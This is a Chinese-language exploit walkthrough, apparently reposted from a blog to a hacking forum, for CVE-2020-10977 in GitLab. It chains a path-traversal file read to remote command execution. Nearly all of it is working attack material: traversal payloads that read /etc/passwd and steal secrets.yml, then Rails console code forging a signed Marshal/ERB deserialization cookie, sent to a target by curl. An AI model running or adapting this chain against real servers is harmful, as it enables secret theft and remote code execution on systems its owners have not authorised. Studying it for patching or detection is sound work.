跳转至

CVE-2020-10977 Gitlab任意文件读取导致远程命令执行

任意文件读取

新建两个测试项目

在其中一个project中创建新的issue,在其问题描述中输入下方代码,然后提交

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

创建issue成功后点击move issue,将它移动到test2中

test2中的issue中带了一个password附件

点击下载password附件,用记事本方式打开,发现其内容就是/etc/password的内容

RCE(remote command/code execute)

利用任意文件读取漏洞

下载/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml文件,获取secret_key_base

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

下载secrets.yml,获取secret_key_base

在自己的攻击机上搭建一个gitlab环境(详见环境搭建笔记)

将目标机下载下来的secerts.yml覆盖在自己攻击机上/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

(也可以只替换secret_key_base)

使用gitlab-rails console执行以下命令

gitlab-rails console #进入rails console

依次输入:

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `echo flag was here > /tmp/flag` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

获取cookie,构造语句:

curl -vvv 'http://192.168.1.86:8888/users/sign_in' -b "experimentation_subject_id=cookie"

(ps:experimentation_subject_id参数输入rail console获取的cookie值)

通过任意文件读取下载/tmp/flag文件,内容:“flag was here”,说明命令执行成功!

EXP:https://www.exploit-db.com/exploits/48431

参考:https://hackerone.com/reports/827052

来源csdn博客,原文已删。

https://forum.ywhack.com/thread-114698-1-3.html